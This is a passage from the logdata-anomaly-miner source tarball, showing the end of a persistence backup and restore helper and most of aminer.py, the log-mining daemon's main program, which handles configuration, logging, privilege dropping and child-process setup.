--restore') parser.add_argument('-p', '--persistence-dir', type=str, help='set the persistence directory. Only used with --restore') args = parser.parse_args() absolute_persistence_path = None config_file_name = args.config rc_response_string = 'Remote execution response: ' if args.list: # skipcq: BAN-B605, BAN-B607 process = os.popen('sudo aminerremotecontrol --exec "list_backups(analysis_context)"') print(process.read().strip('\n').strip(rc_response_string)) if args.backup: # skipcq: BAN-B605, BAN-B607 process = os.popen('sudo aminerremotecontrol --exec "create_backup(analysis_context)"') print(process.read().strip('\n').strip(rc_response_string)) if args.restore is not None: if not args.restore.startswith('/'): print('The restore path must be absolute.', file=sys.stderr) sys.exit(1) absolute_persistence_path = args.restore if '.' in args.user or '/' in args.user: print(f"The aminer user {args.user} must not contain any . or /", file=sys.stderr) sys.exit(1) aminer_user = args.user if '.' in args.group or '/' in args.group: print(f"The aminer group {args.group} must not contain any . or /", file=sys.stderr) sys.exit(1) aminer_grp = args.group if not args.persistence_dir.startswith('/'): print('The persistence_dir path must be absolute.', file=sys.stderr) sys.exit(1) persistence_dir = args.persistence_dir if absolute_persistence_path is not None: if config_file_name is not None: aminer_config = load_config(config_file_name) if args.user is None: aminer_user = aminer_config.config_properties[KEY_AMINER_USER] if args.group is None: aminer_grp = aminer_config.config_properties[KEY_AMINER_GROUP] if args.persistence_dir is None: persistence_dir = aminer_config.config_properties[KEY_PERSISTENCE_DIR] else: aminer_user = 'aminer' aminer_grp = 'aminer' persistence_dir = '/var/lib/aminer' if not os.path.exists(absolute_persistence_path): print(f"{absolute_persistence_path} does not exist.", file=sys.stderr) else: from pwd import getpwnam from grp import getgrnam child_user_id = getpwnam(aminer_user).pw_uid child_group_id = getgrnam(aminer_grp).gr_gid clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_group_id) print(f"Restored persistence from {absolute_persistence_path} successfully.") main() logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer.py000077500000000000000000001157101437606560100275710ustar00rootroot00000000000000#!/usr/bin/python3 -BbbEIsSttW all # -*- coding: utf-8 -*- """ This is the main program of the "aminer" logfile miner tool. It does not import any local default site packages to decrease the attack surface due to manipulation of unused but available packages. CAVEAT: This process will keep running with current permissions, no matter what was specified in 'AminerUser' and 'AminerGroup' configuration properties. This is required to allow the aminer parent parent process to reopen log files, which might need the elevated privileges. NOTE: This tool is developed to allow secure operation even in hostile environment, e.g. when one directory, where aminer attempts to open logfiles is already under full control of an attacker. However it is not intended to be run as SUID-binary, this would require code changes to protect also against standard SUID attacks. Parameters: * --config [file]: Location of configuration file, defaults to '/etc/aminer/config.py' when not set. * --run-analysis: This parameters is NOT intended to be used on command line when starting aminer, it will trigger execution of the unprivileged aminer background child performing the real analysis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import re import socket import time import sys import logging import shutil import warnings import argparse import stat import tempfile import ast from pwd import getpwnam from grp import getgrnam from logging.handlers import RotatingFileHandler # As site packages are not included, define from where we need to execute code before loading it. sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] import aminer.AminerConfig as AminerConfig # skipcq: FLK-E402 from aminer.util.StringUtil import colflame, flame, supports_color, decode_string_as_byte_string # skipcq: FLK-E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # skipcq: FLK-E402 from aminer.util import SecureOSFunctions # skipcq: FLK-E402 from aminer.AnalysisChild import AnalysisChild # skipcq: FLK-E402 from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource # skipcq: FLK-E402 from metadata import __version_string__, __version__ # skipcq: FLK-E402 child_termination_triggered_flag = False offline_mode = False def run_analysis_child(aminer_config, program_name): """Run the Analysis Child.""" # Verify existence and ownership of persistence directory. logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME).info('aminer started.') logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info('aminer started.') persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) stat_result = os.fstat(persistence_dir_fd) if ((not stat.S_ISDIR(stat_result.st_mode)) or ((stat_result.st_mode & stat.S_IRWXU) != 0o700) or ( stat_result.st_uid != os.getuid()) or (stat_result.st_gid != os.getgid())): msg = f"FATAL: persistence directory \"{repr(persistence_dir_name)}\" has to be owned by analysis process (uid " \ f"{stat_result.st_uid}!={os.getuid()}, gid {stat_result.st_gid}!={os.getgid()}) and have access mode 0700 only!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).critical(msg) sys.exit(1) import posix1e # O_PATH is problematic when checking ACL. However it is possible to check the ACL using the file name. try: if posix1e.has_extended(persistence_dir_name): msg = f"WARNING: SECURITY: Extended POSIX ACLs are set in {persistence_dir_name.decode()}, but not supported by the aminer. " \ f"Backdoor access could be possible." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) except OSError: # system does not support POSIX ACLs. pass child = AnalysisChild(program_name, aminer_config) child.offline_mode = offline_mode # This function call will only return on error or signal induced normal termination. child_return_status = child.run_analysis(3) if child_return_status == 0: sys.exit(0) msg = f"{program_name}: run_analysis terminated with unexpected status {child_return_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(AminerConfig.KEY_LOG_DIR, AminerConfig.DEFAULT_LOG_DIR) if log_dir == AminerConfig.DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory( persistence_dir_path, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) if SecureOSFunctions.base_dir_path.decode() == AminerConfig.DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(AminerConfig.DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_STAT_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_DEBUG_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) max_bytes = aminer_config.config_properties.get(AminerConfig.KEY_LOG_ROTATION_MAX_BYTES, AminerConfig.DEFAULT_LOG_ROTATION_MAX_BYTES) backup_count = aminer_config.config_properties.get( AminerConfig.KEY_LOG_ROTATION_BACKUP_COUNT, AminerConfig.DEFAULT_LOG_ROTATION_BACKUP_COUNT) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = RotatingFileHandler(remote_control_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {remote_control_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(AminerConfig.STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get( AminerConfig.KEY_STAT_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = RotatingFileHandler(stat_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {stat_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(AminerConfig.DEBUG_LOG_NAME) if AminerConfig.DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif AminerConfig.DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( AminerConfig.KEY_DEBUG_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = RotatingFileHandler(debug_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {debug_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler) def parse_var(s): """ Parse a key, value pair, separated by "=". That's the reverse of ShellArgs. On the command line (argparse) a declaration will typically look like: foo=hello or foo="hello world" """ items = s.split("=") key = items[0].strip() # we remove blanks around keys, as is logical if len(items) > 1: # rejoin the rest: value = "=".join(items[1:]) return key, value def parse_vars(items): """Parse a series of key-value pairs and return a dictionary.""" d = {} if items: for item in items: key, value = parse_var(item) d[key] = value return d def main(): """Run the aminer main program.""" # Extract program name, but only when sure to contain no problematic characters. warnings.filterwarnings('ignore', category=ImportWarning) program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) # We will not read stdin from here on, so get rid of it immediately, thus aberrant child cannot manipulate caller's stdin using it. stdin_fd = os.open('/dev/null', os.O_RDONLY) os.dup2(stdin_fd, 0) os.close(stdin_fd) help_message = 'aminer - logdata-anomaly-miner\n' if supports_color(): help_message += colflame else: help_message += flame parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-u', '--check-updates', action='store_true', help='check if updates for the aminer are available.') parser.add_argument('-c', '--config', default='/etc/aminer/config.yml', type=str, help='path to the config-file') parser.add_argument('-D', '--daemon', action='store_false', help='run as a daemon process') parser.add_argument('-s', '--stat', choices=["0", "1", "2"], type=str, help='set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for ' 'verbose statistics.') parser.add_argument('-d', '--debug', choices=["0", "1", "2"], type=str, help='set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 ' 'for printing all debug information.') parser.add_argument('--run-analysis', action='store_true', help='enable/disable analysis') parser.add_argument('-C', '--clear', action='store_true', help='removes all persistence directories') parser.add_argument('-r', '--remove', action='append', type=str, help='removes a specific persistence directory') parser.add_argument('-R', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-f', '--from-begin', action='store_true', help='removes RepositioningData before starting the aminer') parser.add_argument('-o', '--offline-mode', action='store_true', help='stop the aminer after all logs have been processed.') parser.add_argument("--config-properties", metavar="KEY=VALUE", nargs='+', help="Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). " "If a value contains spaces, you should define it with double quotes: 'foo=\"this is a sentence\". Note that " "values are always treated as strings. If values are already defined in the config_properties, the input " "types are converted to the ones already existing.") args = parser.parse_args() if args.check_updates: import urllib3 url = 'https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/source/root/usr/lib/logdata-anomaly-miner/metadata.py' http = urllib3.PoolManager() r = http.request('GET', url, preload_content=True) metadata = r.data.decode() http.clear() lines = metadata.split('\n') curr_version = None for line in lines: if '__version__ = ' in line: curr_version = line.split('__version__ = ')[1].strip('"') break if __version__ == curr_version: print(f"The current aminer version {curr_version} is installed.") else: print(f"A new aminer version exists ({curr_version}). Currently version {__version__} is installed.") print("Use git pull to update the aminer version.") sys.exit(0) config_file_name = args.config run_in_foreground_flag = args.daemon run_analysis_child_flag = args.run_analysis clear_persistence_flag = args.clear remove_persistence_dirs = args.remove from_begin_flag = args.from_begin global offline_mode # skipcq: PYL-W0603 offline_mode = args.offline_mode if args.restore is not None and ('.' in args.restore or '/' in args.restore): parser.error(f"The restore path {args.restore} must not contain any . or /") if args.remove is not None: for remove in args.remove: if '.' in remove or '/' in remove: parser.error(f"The remove path {remove} must not contain any . or /") restore_relative_persistence_path = args.restore stat_level = 1 debug_level = 1 stat_level_console_flag = False debug_level_console_flag = False if args.stat is not None: stat_level = int(args.stat) stat_level_console_flag = True if args.debug is not None: debug_level = int(args.debug) debug_level_console_flag = True # Load the main configuration file. if not os.path.exists(config_file_name): print(f"{program_name}: config \"{config_file_name}\" not (yet) available!", file=sys.stderr) sys.exit(1) # using the solution here to override config_properties: # https://stackoverflow.com/questions/27146262/create-variable-key-value-pairs-with-argparse-python use_temp_config = False config_properties = parse_vars(args.config_properties) if args.config_properties and "LearnMode" in config_properties: ymlext = [".YAML", ".YML", ".yaml", ".yml"] extension = os.path.splitext(config_file_name)[1] if extension in ymlext: use_temp_config = True fd, temp_config = tempfile.mkstemp(suffix=".yml") with open(config_file_name) as f: for line in f: if "LearnMode" in line: line = "LearnMode: %s" % config_properties["LearnMode"] os.write(fd, line.encode()) config_file_name = temp_config os.close(fd) else: msg = "The LearnMode parameter does not exist in .py configs!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Minimal import to avoid loading too much within the privileged process. try: aminer_config = AminerConfig.load_config(config_file_name) if use_temp_config: os.remove(config_file_name) config_file_name = args.config except ValueError: sys.exit(1) for config_property in config_properties: if config_property == "LearnMode": continue old_value = aminer_config.config_properties.get(config_property) value = config_properties[config_property] if old_value is not None: try: if isinstance(old_value, bool): if value == "True": value = True elif value == "False": value = False else: msg = f"The {config_property} parameter must be of type {type(old_value)}!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) elif isinstance(old_value, int): value = int(value) elif isinstance(old_value, float): value = float(value) elif isinstance(old_value, list): value = ast.literal_eval(value) except ValueError: msg = f"The {config_property} parameter must be of type {type(old_value)}!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"The {config_property} parameter is not set in the config. It will be treated as a string!" print("WARNING: " + msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) aminer_config.config_properties[config_property] = value persistence_dir = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) child_user_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) child_group_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) child_user_id = -1 child_group_id = -1 try: if child_user_name is not None: child_user_id = getpwnam(child_user_name).pw_uid if child_group_name is not None: child_group_id = getgrnam(child_group_name).gr_gid except: # skipcq: FLK-E722 print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) if not stat_level_console_flag and AminerConfig.KEY_LOG_STAT_LEVEL in aminer_config.config_properties: stat_level = aminer_config.config_properties[AminerConfig.KEY_LOG_STAT_LEVEL] if not debug_level_console_flag and AminerConfig.KEY_LOG_DEBUG_LEVEL in aminer_config.config_properties: debug_level = aminer_config.config_properties[AminerConfig.KEY_LOG_DEBUG_LEVEL] if AminerConfig.CONFIG_KEY_ENCODING in aminer_config.config_properties: AminerConfig.ENCODING = aminer_config.config_properties[AminerConfig.CONFIG_KEY_ENCODING] AminerConfig.STAT_LEVEL = stat_level AminerConfig.DEBUG_LEVEL = debug_level initialize_loggers(aminer_config, child_user_id, child_group_id) if restore_relative_persistence_path is not None and (clear_persistence_flag or remove_persistence_dirs): msg = 'The --restore parameter removes all persistence files. Do not use this parameter with --Clear or --Remove!' print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if clear_persistence_flag: if remove_persistence_dirs: msg = 'The --clear and --remove arguments must not be used together!' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) clear_persistence(persistence_dir) if remove_persistence_dirs: persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) for filename in os.listdir(persistence_dir_name): file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) for filename in remove_persistence_dirs: file_path = os.path.join(persistence_dir, filename) try: if not os.path.exists(file_path): continue if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) if restore_relative_persistence_path is not None: absolute_persistence_path = os.path.join(persistence_dir, 'backup', restore_relative_persistence_path) if not os.path.exists(absolute_persistence_path): msg = f"{absolute_persistence_path} does not exist. Continuing without restoring persistence." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) else: clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id, dir_fd=persistence_dir_fd, follow_symlinks=False) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_user_id, dir_fd=persistence_dir_fd, follow_symlinks=False) if from_begin_flag: repositioning_data_path = os.path.join(aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR), 'AnalysisChild', 'RepositioningData') if os.path.exists(repositioning_data_path): os.remove(repositioning_data_path) if run_analysis_child_flag: # Call analysis process, this function will never return. run_analysis_child(aminer_config, program_name) # Start importing of aminer specific components after reading of "config.py" to allow replacement of components via sys.path # from within configuration. log_sources_list = aminer_config.config_properties.get(AminerConfig.KEY_LOG_SOURCES_LIST) if (log_sources_list is None) or not log_sources_list: msg = f"{program_name}: {AminerConfig.KEY_LOG_SOURCES_LIST} not defined" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Now create the management entries for each logfile. log_data_resource_dict = {} for log_resource_name in log_sources_list: # From here on log_resource_name is a byte array. log_resource_name = decode_string_as_byte_string(log_resource_name) log_resource = None if log_resource_name.startswith(b'file://'): log_resource = FileLogDataResource(log_resource_name, -1) elif log_resource_name.startswith(b'unix://'): log_resource = UnixSocketLogDataResource(log_resource_name, -1) else: msg = f"Unsupported schema in {AminerConfig.KEY_LOG_SOURCES_LIST}: {repr(log_resource_name)}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if not os.path.exists(log_resource_name[7:].decode()): msg = f"WARNING: file or socket '{log_resource_name[7:].decode()}' does not exist (yet)!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) try: log_resource.open() except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access{repr(log_resource_name)}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"{program_name}: unexpected error opening {repr(log_resource_name)}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) log_data_resource_dict[log_resource_name] = log_resource # Create the remote control socket, if any. Do this in privileged mode to allow binding it at arbitrary locations and support restricted # permissions of any type for current (privileged) uid. remote_control_socket_name = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_SOCKET_PATH, None) remote_control_socket = None if remote_control_socket_name is not None: if os.path.exists(remote_control_socket_name): try: os.unlink(remote_control_socket_name) except OSError: msg = f"Failed to clean up old remote control socket at {remote_control_socket_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Create the local socket: there is no easy way to create it with correct permissions, hence a fork is needed, setting umask, # bind the socket. It is also recommended to create the socket in a directory having the correct permissions already. remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) remote_control_socket.setblocking(False) bind_child_pid = os.fork() if bind_child_pid == 0: os.umask(0o177) remote_control_socket.bind(remote_control_socket_name) # Do not perform any cleanup, flushing of streams. Use _exit(0) to avoid interference with fork. os._exit(0) # skipcq: PYL-W0212 os.waitpid(bind_child_pid, 0) remote_control_socket.listen(4) # Now have checked all we can get from the configuration in the privileged process. Detach from the TTY when in daemon mode. if not run_in_foreground_flag: child_pid = 0 try: # Fork a child to make sure, we are not the process group leader already. child_pid = os.fork() except Exception as fork_exception: # skipcq: PYL-W0703 msg = 'Failed to daemonize: %s' % fork_exception print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # skipcq: PYL-W0212 # This is the child. Create a new session and become process group leader. Here we get rid of the controlling tty. os.setsid() # Fork again to become an orphaned process not being session leader, hence not able to get a controlling tty again. try: child_pid = os.fork() except Exception as fork_exception: # skipcq: PYL-W0703 msg = f"Failed to daemonize: {fork_exception}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # skipcq: PYL-W0212 # Move to root directory to avoid lingering in some cwd someone else might want to unmount. os.chdir('/') # Change the umask here to clean all group/other mask bits so that accidentially created files are not accessible by other. os.umask(0o77) # Install a signal handler catching common stop signals and relaying it to all children for sure. # skipcq: PYL-W0603 global child_termination_triggered_flag child_termination_triggered_flag = False def graceful_shutdown_handler(_signo, _stackFrame): """React on typical shutdown signals.""" msg = '%s: caught signal, shutting down' % program_name print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Just set the flag. It is likely, that child received same signal also so avoid multiple signaling, which could interrupt the # shutdown procedure again. # skipcq: PYL-W0603 global child_termination_triggered_flag child_termination_triggered_flag = True import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Now create the socket to connect the analysis child. (parent_socket, child_socket) = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM, 0) # Have it nonblocking from here on. parent_socket.setblocking(False) child_socket.setblocking(False) # Use normal fork, we should have been detached from TTY already. Flush stderr to avoid duplication of output if both child and # parent want to write something. sys.stderr.flush() child_pid = os.fork() if child_pid == 0: # Relocate the child socket fd to 3 if needed if child_socket.fileno() != 3: os.dup2(child_socket.fileno(), 3) child_socket.close() # Clear the supplementary groups before dropping privileges. This makes only sense when changing the uid or gid. if os.getuid() == 0: if ((child_user_id != -1) and (child_user_id != os.getuid())) or ((child_group_id != -1) and (child_group_id != os.getgid())): os.setgroups([]) # Drop privileges before executing child. setuid/gid will raise an exception when call has failed. if child_group_id != -1: os.setgid(child_group_id) if child_user_id != -1: os.setuid(child_user_id) else: msg = 'INFO: No privilege separation when started as unprivileged user' print(msg, file=sys.stderr) tmp_username = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) tmp_group = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) aminer_user_id = -1 aminer_group_id = -1 try: if tmp_username is not None: aminer_user_id = getpwnam(tmp_username).pw_uid if tmp_group is not None: aminer_group_id = getgrnam(tmp_group).gr_gid except: # skipcq: FLK-E722 print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) initialize_loggers(aminer_config, aminer_user_id, aminer_group_id) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Now resolve the specific analysis configuration file (if any). analysis_config_file_name = aminer_config.config_properties.get(AminerConfig.KEY_ANALYSIS_CONFIG_FILE, None) if analysis_config_file_name is None: analysis_config_file_name = config_file_name elif not os.path.isabs(analysis_config_file_name): analysis_config_file_name = os.path.join(os.path.dirname(config_file_name), analysis_config_file_name) # This is the child. Close all parent file descriptors, we do not need. Perhaps this could be done more elegantly. for close_fd in range(4, 1 << 16): try: os.close(close_fd) except OSError as open_os_error: if open_os_error.errno == errno.EBADF: continue msg = f"{program_name}: unexpected exception closing file descriptors:{open_os_error}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) # Flush stderr before exit without any cleanup. sys.stderr.flush() os._exit(1) # skipcq: PYL-W0212 # Now execute the very same program again, but user might have moved or renamed it meanwhile. This would be problematic with # SUID-binaries (which we do not yet support). Do NOT just fork but also exec to avoid child circumventing # parent's ALSR due to cloned kernel VMA. exec_args = ['aminerChild', '--run-analysis', '--config', analysis_config_file_name, '--stat', str(stat_level), '--debug', str(debug_level)] if offline_mode: exec_args.append("--offline-mode") if args.config_properties: exec_args.append("--config-properties") for config_property in args.config_properties: exec_args.append(config_property) os.execv(sys.argv[0], exec_args) # skipcq: BAN-B606 msg = 'Failed to execute child process' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.stderr.flush() os._exit(1) # skipcq: PYL-W0212 child_socket.close() # Send all log resource information currently available to child process. for log_resource_name, log_resource in log_data_resource_dict.items(): if (log_resource is not None) and (log_resource.get_file_descriptor() >= 0): SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), log_resource_name) log_resource.close() # Send the remote control server socket, if any and close it afterwards. It is not needed any more on parent side. if remote_control_socket is not None: SecureOSFunctions.send_annotated_file_descriptor(parent_socket, remote_control_socket.fileno(), 'remotecontrol', '') remote_control_socket.close() exit_status = 0 child_termination_triggered_count = 0 while True: if child_termination_triggered_flag: if child_termination_triggered_count == 0: time.sleep(1) elif child_termination_triggered_count < 5: os.kill(child_pid, signal.SIGTERM) else: os.kill(0, signal.SIGKILL) child_termination_triggered_count += 1 (sig_child_pid, sig_status) = os.waitpid(-1, os.WNOHANG) if sig_child_pid != 0: if sig_child_pid == child_pid: if child_termination_triggered_flag or offline_mode: # This was expected, just terminate. break msg = f"{program_name}: Analysis child process {sig_child_pid} terminated unexpectedly with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 break # So the child has been cloned, the clone has terminated. This should not happen either. msg = f"{program_name}: untracked child {sig_child_pid} terminated with with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 # Child information handled, scan for rotated logfiles or other resources, where reopening might make sense. for log_resouce_name, log_data_resource in 